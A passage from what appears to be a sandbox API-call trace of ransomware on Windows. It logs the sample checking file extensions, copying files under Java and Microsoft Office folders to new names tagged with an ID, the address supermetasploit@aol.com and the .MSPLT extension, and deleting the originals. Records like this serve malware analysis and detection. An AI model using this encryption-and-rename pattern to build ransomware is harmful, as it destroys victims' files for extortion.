lpString2="certs") returned -1 [0315.054] lstrlenW (lpString=".pdf") returned 4 [0315.054] lstrcmpiW (lpString1=".pdf", lpString2="erts") returned -1 [0315.054] lstrlenW (lpString=".xls") returned 4 [0315.054] lstrcmpiW (lpString1=".xls", lpString2="erts") returned -1 [0315.054] lstrlenW (lpString=".xlsx") returned 5 [0315.054] lstrcmpiW (lpString1=".xlsx", lpString2="certs") returned -1 [0315.055] lstrlenW (lpString=".ppt") returned 4 [0315.055] lstrcmpiW (lpString1=".ppt", lpString2="erts") returned -1 [0315.055] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\cacerts") returned 55 [0315.055] lstrlenW (lpString=".zip") returned 4 [0315.055] lstrcmpiW (lpString1=".zip", lpString2="erts") returned -1 [0315.055] lstrlenW (lpString=".rar") returned 4 [0315.055] lstrcmpiW (lpString1=".rar", lpString2="erts") returned -1 [0315.055] lstrlenW (lpString=".bz2") returned 4 [0315.055] lstrcmpiW (lpString1=".bz2", lpString2="erts") returned -1 [0315.055] lstrlenW (lpString=".7z") returned 3 [0315.055] lstrcmpiW (lpString1=".7z", lpString2="rts") returned -1 [0315.055] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\cacerts") returned 55 [0315.055] lstrlenW (lpString=".dbf") returned 4 [0315.055] lstrcmpiW (lpString1=".dbf", lpString2="erts") returned -1 [0315.055] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\cacerts") returned 55 [0315.055] lstrlenW (lpString=".1cd") returned 4 [0315.055] lstrcmpiW (lpString1=".1cd", lpString2="erts") returned -1 [0315.055] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\cacerts") returned 55 [0315.055] lstrlenW (lpString=".jpg") returned 4 [0315.055] lstrcmpiW (lpString1=".jpg", lpString2="erts") returned -1 [0315.055] lstrcmpiW (lpString1=".0_144\\release", lpString2=".MSPLT") returned -1 [0315.055] lstrlenW (lpString="release") returned 7 [0315.056] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\release" (normalized: "c:\\program files\\java\\jre1.8.0_144\\release"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0315.056] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=528) returned 1 [0315.056] CloseHandle (hObject=0x3b0) returned 1 [0315.056] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\release" (normalized: "c:\\program files\\java\\jre1.8.0_144\\release")) returned 0x20 [0315.057] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\release.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\release.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0315.057] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\release" (normalized: "c:\\program files\\java\\jre1.8.0_144\\release"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0315.057] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0315.057] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0315.057] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\release.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\release.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x534 [0315.060] GetLastError () returned 0x0 [0315.060] ReadFile (in: hFile=0x3b0, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x210, lpOverlapped=0x0) returned 1 [0315.062] WriteFile (in: hFile=0x534, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0x220, lpOverlapped=0x0) returned 1 [0315.063] ReadFile (in: hFile=0x3b0, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x0, lpOverlapped=0x0) returned 1 [0315.063] WriteFile (in: hFile=0x534, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0xe2, lpOverlapped=0x0) returned 1 [0315.063] SetEndOfFile (hFile=0x534) returned 1 [0315.063] CloseHandle (hObject=0x534) returned 1 [0315.064] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0315.064] SetEndOfFile (hFile=0x3b0) returned 1 [0315.068] CloseHandle (hObject=0x3b0) returned 1 [0315.068] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\release.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0315.068] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\release" (normalized: "c:\\program files\\java\\jre1.8.0_144\\release")) returned 1 [0315.069] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\release") returned 42 [0315.069] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\release") returned 42 [0315.069] lstrlenW (lpString=".doc") returned 4 [0315.069] lstrcmpiW (lpString1=".doc", lpString2="ease") returned -1 [0315.069] lstrlenW (lpString=".docx") returned 5 [0315.069] lstrcmpiW (lpString1=".docx", lpString2="lease") returned -1 [0315.069] lstrlenW (lpString=".pdf") returned 4 [0315.069] lstrcmpiW (lpString1=".pdf", lpString2="ease") returned -1 [0315.069] lstrlenW (lpString=".xls") returned 4 [0315.069] lstrcmpiW (lpString1=".xls", lpString2="ease") returned -1 [0315.069] lstrlenW (lpString=".xlsx") returned 5 [0315.069] lstrcmpiW (lpString1=".xlsx", lpString2="lease") returned -1 [0315.070] lstrlenW (lpString=".ppt") returned 4 [0315.070] lstrcmpiW (lpString1=".ppt", lpString2="ease") returned -1 [0315.070] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\release") returned 42 [0315.070] lstrlenW (lpString=".zip") returned 4 [0315.070] lstrcmpiW (lpString1=".zip", lpString2="ease") returned -1 [0315.070] lstrlenW (lpString=".rar") returned 4 [0315.070] lstrcmpiW (lpString1=".rar", lpString2="ease") returned -1 [0315.070] lstrlenW (lpString=".bz2") returned 4 [0315.070] lstrcmpiW (lpString1=".bz2", lpString2="ease") returned -1 [0315.070] lstrlenW (lpString=".7z") returned 3 [0315.070] lstrcmpiW (lpString1=".7z", lpString2="ase") returned -1 [0315.070] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\release") returned 42 [0315.070] lstrlenW (lpString=".dbf") returned 4 [0315.070] lstrcmpiW (lpString1=".dbf", lpString2="ease") returned -1 [0315.070] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\release") returned 42 [0315.070] lstrlenW (lpString=".1cd") returned 4 [0315.070] lstrcmpiW (lpString1=".1cd", lpString2="ease") returned -1 [0315.070] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\release") returned 42 [0315.070] lstrlenW (lpString=".jpg") returned 4 [0315.070] lstrcmpiW (lpString1=".jpg", lpString2="ease") returned -1 [0315.070] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\release") returned 42 [0315.070] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\release") returned 42 [0315.070] lstrlenW (lpString=".doc") returned 4 [0315.071] lstrcmpiW (lpString1=".doc", lpString2="ease") returned -1 [0315.071] lstrlenW (lpString=".docx") returned 5 [0315.071] lstrcmpiW (lpString1=".docx", lpString2="lease") returned -1 [0315.071] lstrlenW (lpString=".pdf") returned 4 [0315.071] lstrcmpiW (lpString1=".pdf", lpString2="ease") returned -1 [0315.071] lstrlenW (lpString=".xls") returned 4 [0315.071] lstrcmpiW (lpString1=".xls", lpString2="ease") returned -1 [0315.071] lstrlenW (lpString=".xlsx") returned 5 [0315.071] lstrcmpiW (lpString1=".xlsx", lpString2="lease") returned -1 [0315.071] lstrlenW (lpString=".ppt") returned 4 [0315.071] lstrcmpiW (lpString1=".ppt", lpString2="ease") returned -1 [0315.071] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\release") returned 42 [0315.071] lstrlenW (lpString=".zip") returned 4 [0315.071] lstrcmpiW (lpString1=".zip", lpString2="ease") returned -1 [0315.071] lstrlenW (lpString=".rar") returned 4 [0315.071] lstrcmpiW (lpString1=".rar", lpString2="ease") returned -1 [0315.071] lstrlenW (lpString=".bz2") returned 4 [0315.071] lstrcmpiW (lpString1=".bz2", lpString2="ease") returned -1 [0315.071] lstrlenW (lpString=".7z") returned 3 [0315.071] lstrcmpiW (lpString1=".7z", lpString2="ase") returned -1 [0315.071] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\release") returned 42 [0315.071] lstrlenW (lpString=".dbf") returned 4 [0315.072] lstrcmpiW (lpString1=".dbf", lpString2="ease") returned -1 [0315.072] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\release") returned 42 [0315.072] lstrlenW (lpString=".1cd") returned 4 [0315.072] lstrcmpiW (lpString1=".1cd", lpString2="ease") returned -1 [0315.072] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\release") returned 42 [0315.072] lstrlenW (lpString=".jpg") returned 4 [0315.072] lstrcmpiW (lpString1=".jpg", lpString2="ease") returned -1 [0315.072] lstrcmpiW (lpString1=".exe", lpString2=".MSPLT") returned -1 [0315.072] lstrlenW (lpString="modules_recommend.exe") returned 21 [0315.072] CreateFileW (lpFileName="C:\\Program Files\\Java\\modules_recommend.exe" (normalized: "c:\\program files\\java\\modules_recommend.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x530 [0315.161] GetFileSizeEx (in: hFile=0x530, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=78336) returned 1 [0315.161] CloseHandle (hObject=0x530) returned 1 [0315.161] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\modules_recommend.exe" (normalized: "c:\\program files\\java\\modules_recommend.exe")) returned 0x20 [0315.165] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\modules_recommend.exe.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\modules_recommend.exe.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0315.166] CreateFileW (lpFileName="C:\\Program Files\\Java\\modules_recommend.exe" (normalized: "c:\\program files\\java\\modules_recommend.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0315.168] lstrlenW (lpString="C:\\Program Files\\Java\\modules_recommend.exe") returned 43 [0315.168] lstrlenW (lpString="C:\\Program Files\\Java\\modules_recommend.exe") returned 43 [0315.168] lstrlenW (lpString=".doc") returned 4 [0315.168] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0315.168] lstrlenW (lpString=".docx") returned 5 [0315.168] lstrcmpiW (lpString1=".docx", lpString2="d.exe") returned -1 [0315.168] lstrlenW (lpString=".pdf") returned 4 [0315.168] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0315.168] lstrlenW (lpString=".xls") returned 4 [0315.168] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0315.168] lstrlenW (lpString=".xlsx") returned 5 [0315.168] lstrcmpiW (lpString1=".xlsx", lpString2="d.exe") returned -1 [0315.168] lstrlenW (lpString=".ppt") returned 4 [0315.168] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0315.168] lstrlenW (lpString="C:\\Program Files\\Java\\modules_recommend.exe") returned 43 [0315.168] lstrlenW (lpString=".zip") returned 4 [0315.168] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0315.168] lstrlenW (lpString=".rar") returned 4 [0315.168] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0315.168] lstrlenW (lpString=".bz2") returned 4 [0315.168] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0315.168] lstrlenW (lpString=".7z") returned 3 [0315.168] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0315.169] lstrlenW (lpString="C:\\Program Files\\Java\\modules_recommend.exe") returned 43 [0315.169] lstrlenW (lpString=".dbf") returned 4 [0315.169] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0315.169] lstrlenW (lpString="C:\\Program Files\\Java\\modules_recommend.exe") returned 43 [0315.169] lstrlenW (lpString=".1cd") returned 4 [0315.169] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0315.169] lstrlenW (lpString="C:\\Program Files\\Java\\modules_recommend.exe") returned 43 [0315.169] lstrlenW (lpString=".jpg") returned 4 [0315.169] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0315.169] lstrlenW (lpString="C:\\Program Files\\Java\\modules_recommend.exe") returned 43 [0315.169] lstrlenW (lpString="C:\\Program Files\\Java\\modules_recommend.exe") returned 43 [0315.169] lstrlenW (lpString=".doc") returned 4 [0315.169] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0315.169] lstrlenW (lpString=".docx") returned 5 [0315.169] lstrcmpiW (lpString1=".docx", lpString2="d.exe") returned -1 [0315.169] lstrlenW (lpString=".pdf") returned 4 [0315.169] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0315.169] lstrlenW (lpString=".xls") returned 4 [0315.169] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0315.169] lstrlenW (lpString=".xlsx") returned 5 [0315.169] lstrcmpiW (lpString1=".xlsx", lpString2="d.exe") returned -1 [0315.169] lstrlenW (lpString=".ppt") returned 4 [0315.169] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0315.170] lstrlenW (lpString="C:\\Program Files\\Java\\modules_recommend.exe") returned 43 [0315.170] lstrlenW (lpString=".zip") returned 4 [0315.170] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0315.170] lstrlenW (lpString=".rar") returned 4 [0315.170] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0315.170] lstrlenW (lpString=".bz2") returned 4 [0315.170] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0315.170] lstrlenW (lpString=".7z") returned 3 [0315.170] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0315.170] lstrlenW (lpString="C:\\Program Files\\Java\\modules_recommend.exe") returned 43 [0315.170] lstrlenW (lpString=".dbf") returned 4 [0315.170] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0315.170] lstrlenW (lpString="C:\\Program Files\\Java\\modules_recommend.exe") returned 43 [0315.170] lstrlenW (lpString=".1cd") returned 4 [0315.170] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0315.170] lstrlenW (lpString="C:\\Program Files\\Java\\modules_recommend.exe") returned 43 [0315.170] lstrlenW (lpString=".jpg") returned 4 [0315.170] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0315.170] lstrcmpiW (lpString1=".exe", lpString2=".MSPLT") returned -1 [0315.171] lstrlenW (lpString="afr38.exe") returned 9 [0315.171] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\afr38.exe" (normalized: "c:\\program files\\microsoft office\\afr38.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x530 [0315.175] GetFileSizeEx (in: hFile=0x530, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=78336) returned 1 [0315.175] CloseHandle (hObject=0x530) returned 1 [0315.175] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\afr38.exe" (normalized: "c:\\program files\\microsoft office\\afr38.exe")) returned 0x20 [0315.175] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\afr38.exe.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\afr38.exe.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0315.175] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\afr38.exe" (normalized: "c:\\program files\\microsoft office\\afr38.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0315.176] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\afr38.exe") returned 43 [0315.176] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\afr38.exe") returned 43 [0315.176] lstrlenW (lpString=".doc") returned 4 [0315.176] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0315.176] lstrlenW (lpString=".docx") returned 5 [0315.176] lstrcmpiW (lpString1=".docx", lpString2="8.exe") returned -1 [0315.176] lstrlenW (lpString=".pdf") returned 4 [0315.176] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0315.176] lstrlenW (lpString=".xls") returned 4 [0315.176] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0315.176] lstrlenW (lpString=".xlsx") returned 5 [0315.176] lstrcmpiW (lpString1=".xlsx", lpString2="8.exe") returned -1 [0315.176] lstrlenW (lpString=".ppt") returned 4 [0315.176] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0315.176] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\afr38.exe") returned 43 [0315.177] lstrlenW (lpString=".zip") returned 4 [0315.177] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0315.177] lstrlenW (lpString=".rar") returned 4 [0315.177] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0315.177] lstrlenW (lpString=".bz2") returned 4 [0315.177] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0315.177] lstrlenW (lpString=".7z") returned 3 [0315.177] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0315.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\afr38.exe") returned 43 [0315.177] lstrlenW (lpString=".dbf") returned 4 [0315.177] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0315.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\afr38.exe") returned 43 [0315.177] lstrlenW (lpString=".1cd") returned 4 [0315.177] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0315.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\afr38.exe") returned 43 [0315.177] lstrlenW (lpString=".jpg") returned 4 [0315.177] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0315.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\afr38.exe") returned 43 [0315.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\afr38.exe") returned 43 [0315.178] lstrlenW (lpString=".doc") returned 4 [0315.178] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0315.178] lstrlenW (lpString=".docx") returned 5 [0315.178] lstrcmpiW (lpString1=".docx", lpString2="8.exe") returned -1 [0315.178] lstrlenW (lpString=".pdf") returned 4 [0315.178] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0315.178] lstrlenW (lpString=".xls") returned 4 [0315.178] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0315.178] lstrlenW (lpString=".xlsx") returned 5 [0315.178] lstrcmpiW (lpString1=".xlsx", lpString2="8.exe") returned -1 [0315.178] lstrlenW (lpString=".ppt") returned 4 [0315.178] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0315.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\afr38.exe") returned 43 [0315.178] lstrlenW (lpString=".zip") returned 4 [0315.178] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0315.178] lstrlenW (lpString=".rar") returned 4 [0315.178] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0315.178] lstrlenW (lpString=".bz2") returned 4 [0315.178] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0315.179] lstrlenW (lpString=".7z") returned 3 [0315.179] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0315.179] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\afr38.exe") returned 43 [0315.179] lstrlenW (lpString=".dbf") returned 4 [0315.179] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0315.179] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\afr38.exe") returned 43 [0315.179] lstrlenW (lpString=".1cd") returned 4 [0315.179] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0315.179] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\afr38.exe") returned 43 [0315.179] lstrlenW (lpString=".jpg") returned 4 [0315.179] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0315.179] lstrcmpiW (lpString1=".EXE", lpString2=".MSPLT") returned -1 [0315.179] lstrlenW (lpString="OSPPREARM.EXE") returned 13 [0315.179] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\OSPPREARM.EXE" (normalized: "c:\\program files\\microsoft office\\office16\\ospprearm.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x530 [0315.186] GetFileSizeEx (in: hFile=0x530, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=27200) returned 1 [0315.186] CloseHandle (hObject=0x530) returned 1 [0315.186] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\OSPPREARM.EXE" (normalized: "c:\\program files\\microsoft office\\office16\\ospprearm.exe")) returned 0x20 [0315.186] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\OSPPREARM.EXE.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\office16\\ospprearm.exe.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0315.186] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\OSPPREARM.EXE" (normalized: "c:\\program files\\microsoft office\\office16\\ospprearm.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0315.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPPREARM.EXE") returned 56 [0315.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPPREARM.EXE") returned 56 [0315.187] lstrlenW (lpString=".doc") returned 4 [0315.187] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1 [0315.187] lstrlenW (lpString=".docx") returned 5 [0315.187] lstrcmpiW (lpString1=".docx", lpString2="M.EXE") returned -1 [0315.187] lstrlenW (lpString=".pdf") returned 4 [0315.187] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1 [0315.187] lstrlenW (lpString=".xls") returned 4 [0315.187] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1 [0315.188] lstrlenW (lpString=".xlsx") returned 5 [0315.188] lstrcmpiW (lpString1=".xlsx", lpString2="M.EXE") returned -1 [0315.188] lstrlenW (lpString=".ppt") returned 4 [0315.188] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1 [0315.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPPREARM.EXE") returned 56 [0315.188] lstrlenW (lpString=".zip") returned 4 [0315.188] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1 [0315.188] lstrlenW (lpString=".rar") returned 4 [0315.188] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1 [0315.188] lstrlenW (lpString=".bz2") returned 4 [0315.188] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1 [0315.188] lstrlenW (lpString=".7z") returned 3 [0315.188] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1 [0315.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPPREARM.EXE") returned 56 [0315.188] lstrlenW (lpString=".dbf") returned 4 [0315.188] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1 [0315.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPPREARM.EXE") returned 56 [0315.188] lstrlenW (lpString=".1cd") returned 4 [0315.188] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1 [0315.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPPREARM.EXE") returned 56 [0315.188] lstrlenW (lpString=".jpg") returned 4 [0315.188] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1 [0315.189] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPPREARM.EXE") returned 56 [0315.189] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPPREARM.EXE") returned 56 [0315.189] lstrlenW (lpString=".doc") returned 4 [0315.189] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1 [0315.189] lstrlenW (lpString=".docx") returned 5 [0315.189] lstrcmpiW (lpString1=".docx", lpString2="M.EXE") returned -1 [0315.189] lstrlenW (lpString=".pdf") returned 4 [0315.189] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1 [0315.189] lstrlenW (lpString=".xls") returned 4 [0315.189] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1 [0315.189] lstrlenW (lpString=".xlsx") returned 5 [0315.189] lstrcmpiW (lpString1=".xlsx", lpString2="M.EXE") returned -1 [0315.189] lstrlenW (lpString=".ppt") returned 4 [0315.189] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1 [0315.189] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPPREARM.EXE") returned 56 [0315.189] lstrlenW (lpString=".zip") returned 4 [0315.189] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1 [0315.189] lstrlenW (lpString=".rar") returned 4 [0315.190] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1 [0315.190] lstrlenW (lpString=".bz2") returned 4 [0315.190] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1 [0315.190] lstrlenW (lpString=".7z") returned 3 [0315.190] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1 [0315.190] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPPREARM.EXE") returned 56 [0315.190] lstrlenW (lpString=".dbf") returned 4 [0315.190] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1 [0315.190] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPPREARM.EXE") returned 56 [0315.190] lstrlenW (lpString=".1cd") returned 4 [0315.190] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1 [0315.190] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPPREARM.EXE") returned 56 [0315.190] lstrlenW (lpString=".jpg") returned 4 [0315.190] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1 [0315.190] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0315.191] lstrlenW (lpString="api-ms-win-core-file-l1-2-0.dll") returned 31 [0315.191] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-file-l1-2-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x530 [0315.197] GetFileSizeEx (in: hFile=0x530, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=18624) returned 1 [0315.197] CloseHandle (hObject=0x530) returned 1 [0315.197] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\program files\\microsoft 